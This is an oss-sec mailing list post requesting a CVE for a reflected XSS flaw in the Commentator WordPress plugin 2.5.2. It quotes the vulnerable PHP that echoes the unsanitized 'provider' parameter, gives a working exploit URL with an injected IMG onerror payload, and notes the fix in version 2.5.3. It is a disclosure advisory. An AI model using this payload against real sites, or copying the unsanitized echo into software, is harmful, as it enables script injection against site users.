oss-sec mailing list archives
CVE Request: Commentator WordPress Plugin 2.5.2 XSS Vulnerability
From: Rahul Pratap Singh <techno.rps () gmail com>
Date: Wed, 13 Jan 2016 19:42:12 +0530
Reflected XSS Vulnerability: I would request you to assign CVE id to this issue. ---------------------------------------- Description: ---------------------------------------- "provider" parameter is not sanitized that leads to Reflected XSS. ---------------------------------------- Vulnerable Code: ---------------------------------------- file: commentator.php line:441 $provider_name = $_REQUEST["provider"]; line:544 <div id="commentator-social-signin" class="commentator-<?php echo $provider_name; ?>"> ---------------------------------------- Exploit: ---------------------------------------- /wp-admin/admin-ajax.php?action=commentator_social_signin&provider=facebook">%20<IMG%20SRC=axc%20onerror=alert(1)> ---------------------------------------- POC: ---------------------------------------- https://0x62626262.files.wordpress.com/2016/01/commentatorxsspoc.png Fix: Update to 2.5.3 Disclosure Timeline: reported to vendor : 9/1/2016 vendor response : 11/1/2016 vendor acknowledged : 11/1/2016 vendor deployed a patch: 11/1/2016 Pub ref: http://codecanyon.net/item/commentator-wordpress-plugin/6425752 https://0x62626262.wordpress.com/2016/01/13/commentator-wordpress-plugin-xss-vulnerability
Current thread:
- CVE Request: Commentator WordPress Plugin 2.5.2 XSS Vulnerability Rahul Pratap Singh (Jan 13)
- Re: CVE Request: Commentator WordPress Plugin 2.5.2 XSS Vulnerability Henri Salo (Jan 16)